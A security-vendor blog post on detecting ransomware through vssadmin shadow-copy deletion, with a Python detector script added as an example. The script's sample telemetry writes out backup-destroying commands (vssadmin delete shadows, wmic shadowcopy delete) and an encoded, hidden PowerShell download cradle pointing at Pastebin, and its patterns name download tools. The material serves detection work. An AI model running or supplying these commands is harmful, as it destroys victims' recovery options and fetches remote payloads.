URL:
https://redcanary.com/blog/its-all-fun-and-games-until-ransomware-deletes-the-shadow-copies/
RESOURCES • BLOG • THREAT DETECTION

IT’S ALL FUN AND GAMES UNTIL RANSOMWARE DELETES THE SHADOW COPIES

Adversaries reliably use the Vssadmin Windows process to delete backup files during ransomware infections.
TONY LAMBERT • BRIAN DONOHUE • Originally published August 21, 2019. Last modified June 7, 2022.

Security is too frequently described in terms of wins and losses. When your freshly tuned email filter blocks a phishing email, it’s a win; when an employee downloads a malicious attachment, it’s a loss. Of course, as is nearly always the case, it’s more complicated than that. Not everything is binary, and there are degrees of good and bad. For example, it’s not good when an adversary manages to delete the backup files on one of your endpoints. However, it’s decidedly bad if that adversary manages to encrypt all of the files on that same endpoint, and worse still if the infection spreads to hundreds of other machines on the network.

We detected an adversary deleting Windows Volume Shadow Copy Service (VSS) files on a handful of endpoints a few weeks back. This detection kept a bad situation from getting worse and scored our customer a win from the midst of a losing situation. In the following paragraphs, we hope to offer guidance for how you can stop ransomware infections before they get totally out of hand.

TL;DR

A malicious batch (.bat) file executed a PowerShell command that downloaded and executed a remotely hosted payload on Pastebin to deploy ransomware. Additionally, it launched the Volume Shadow Service Administration Tool (vssadmin.exe) to remove local shadow copies.

THE FULL STORY

Our detection begins with Kaseya, an IT client management tool that wrote a batch script to disk and executed it on one of the endpoints we monitor. In general, IT support and help desk teams use Kaseya to remotely deploy software across an organization or on specific endpoints. Under normal conditions, you’d expect to see Kaseya spawning known binaries associated with legitimate software. However, it can also be a powerful tool in the hands of an adversary seeking to install malware or other malicious tooling in a host environment.
In fact, this is such a common approach among adversaries that MITRE has an ATT&CK technique for it: Application Deployment Software (T1017). This is precisely what we can see happening in the following image.

As a sidebar, it’s worth pointing out that adversaries have leveraged a number of compromised Kaseya accounts to deliver ransomware in the past, according to reporting from BleepingComputer. We’ve seen similar instances where Kaseya has been compromised and used to deploy cryptocurrency miners.

A WILD POWERSHELL EMERGES

In this instance, however, we see PowerShell executing with a variety of Base64-encoded commands. Upon decoding these, we see a network connection going out to Pastebin to download and execute a follow-on command.

WHEN THE SHADOW COPIES DISAPPEAR

The command line associated with the script from Pastebin showed that it was instructing vssadmin.exe to delete shadow copies, a behavior that very often occurs in tandem with ransomware infections.

WHAT’S A VSSADMIN, ANYWAY? AND WHAT IS A SHADOW COPY?

Vssadmin is a default Windows process that manipulates volume shadow copies of the files on a given computer. These shadow copies are often used as backups, and they can be used to restore or revert files to a previous state if they are corrupted or lost for some reason. Vssadmin is commonly used by backup utilities and systems administrators. Because shadow copies are a recovery path, the people responsible for ransomware campaigns often attempt to delete them so that their victims can’t restore file access by reverting to the shadow copies. As a note, interacting with vssadmin should require administrative privileges.

DETECTION VIA VSSADMIN

The command line parameter—vssadmin.exe Delete Shadows—offers us a great opportunity to detect ransomware. In fact, this detector has helped us uncover 496 confirmed threats since we created it.
Beyond this strain of malware, looking for vssadmin manipulation is a reliable method for identifying other ransomware like Robbinhood and more sophisticated threats like Ryuk. In fact, this is so common that MITRE has included it as a technique in ATT&CK: Inhibit System Recovery (T1490).

TESTING YOUR ABILITY TO DETECT THIS TECHNIQUE

If you want to test the detection of this technique in your environment, there are Atomic Red Team tests that will help you do just that!

OPPORTUNITIES FOR DETECTION

The deletion of shadow copies is suspicious enough on its own that we don’t really need to inquire any further. However, we always strive for defense-in-depth, and it’s always preferable for the events we analyze to have more than one detector associated with them—just in case the adversary develops some method for circumventing a specific detector. Of course, there are other ways to remove shadow copies via PowerShell or WMI as well. Other detection opportunities here—with varying levels of fidelity—include:

* PowerShell downloading remotely hosted files
* PowerShell using the encoded command flag
* PowerShell making a network connection to an external paste-site
* PowerShell containing a URL in its command line
* Wmic.exe with command line shadowcopy delete
* PowerShell with command line win32_shadowcopy
* Vssadmin.exe with command line resize shadowstorage

Beyond these, we can see the Pastebin URL in question, and there isn’t much risk in going directly to Pastebin and examining the payload there. At first glance, the filename itself is somewhat suspicious, although that is an admittedly unreliable indicator of malice. What’s more telling is the inclusion of function names that correspond with a PowerShell payload called Invoke-ReflectivePEInjection, which lets an attacker inject a dynamic link library (DLL) directly into PowerShell.
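The detection opportunities listed above, turned into working logic and run over constructed process-event records modelled on this intrusion. This is an added example, not Red Canary's detector code; the event schema (process, command_line, dest_host), the paste-site list and the sample command lines are assumptions for illustration.

```python
"""Detectors for the vssadmin / WMI / PowerShell shadow-copy indicators above.
Added example; event schema and sample data are constructed, not from the post."""
import base64
import re

PASTE_SITES = {"pastebin.com"}  # assumed list; extend for your environment

DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod|"
    r"\birm\b|net\.webclient|start-bitstransfer", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...)
ENCODED_FLAG_RE = re.compile(r"(?:^|\s)[-/](e[a-z]*)(?=\s|$)", re.I)


def decoded_powershell(command_line):
    """Return the plaintext of an -EncodedCommand argument (Base64 over UTF-16LE), else None."""
    for m in ENCODED_FLAG_RE.finditer(command_line):
        if not "encodedcommand".startswith(m.group(1).lower()):
            continue  # e.g. -ExecutionPolicy starts with "ex": not the encoded flag
        rest = command_line[m.end():].split()
        if not rest:
            return None
        try:
            return base64.b64decode(rest[0], validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def evaluate_event(event):
    """Return the names of the detectors that fire on one process event."""
    hits = []
    proc = event.get("process", "").lower()
    cmd = event.get("command_line", "")
    flat = " ".join(cmd.split()).lower()  # normalise spacing and case before matching
    if proc == "vssadmin.exe":
        if "delete shadows" in flat:
            hits.append("vssadmin_delete_shadows")
        if "resize shadowstorage" in flat:
            hits.append("vssadmin_resize_shadowstorage")
    elif proc == "wmic.exe" and "shadowcopy delete" in flat:
        hits.append("wmic_shadowcopy_delete")
    elif proc in ("powershell.exe", "pwsh.exe"):
        decoded = decoded_powershell(cmd)
        if decoded is not None:
            hits.append("powershell_encoded_command")
        text = cmd + " " + (decoded or "")  # inspect the raw and the decoded command
        if "win32_shadowcopy" in text.lower():
            hits.append("powershell_win32_shadowcopy")
        if DOWNLOAD_RE.search(text):
            hits.append("powershell_remote_download")
        urls = URL_RE.findall(text)
        if urls:
            hits.append("powershell_url_in_command_line")
        host = event.get("dest_host", "").lower()
        if host in PASTE_SITES or any(s in u.lower() for u in urls for s in PASTE_SITES):
            hits.append("powershell_paste_site_connection")
    return hits


def encode_powershell(script):
    """Encode a script the way PowerShell expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry; the Pastebin path is a placeholder, not the real URL.
CRADLE = "(New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/PLACEHOLDER')"
SAMPLE_EVENTS = [
    {"process": "vssadmin.exe", "command_line": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"process": "powershell.exe", "dest_host": "pastebin.com",
     "command_line": "powershell.exe -nop -w hidden -enc " + encode_powershell(CRADLE)},
    {"process": "wmic.exe", "command_line": "wmic.exe shadowcopy delete"},
    {"process": "powershell.exe",  # benign admin script: must not fire
     "command_line": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\nightly-backup.ps1"},
    {"process": "vssadmin.exe", "command_line": "vssadmin.exe List Shadows"},  # benign
]


def triage(events):
    """Detector hits per event, in input order."""
    return [evaluate_event(e) for e in events]
```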
Further, at the bottom of the page, you can see a long block of apparent nonsense that, when Base64 decoded, reveals the actual ransomware binary. When we checked that binary in VirusTotal, we learned it had been previously associated with a known malware strain called Sodinokibi. This family, along with a few others, has rushed to take advantage of a post-GandCrab era to make loads of money from ransoming files.

CONCLUSION

Having the capacity to detect when an adversary interacts with vssadmin will provide a reliable method for detecting a wide variety of ransomware. As we explained above, you’ll certainly want more robust detection in the off-chance that an adversary devises a method for circumventing this. However, at a higher level, if you have the necessary visibility required to observe interactions with vssadmin, then you will also have the visibility required to build detection for vast quantities of other threats that materialize in process metadata and other endpoint telemetry.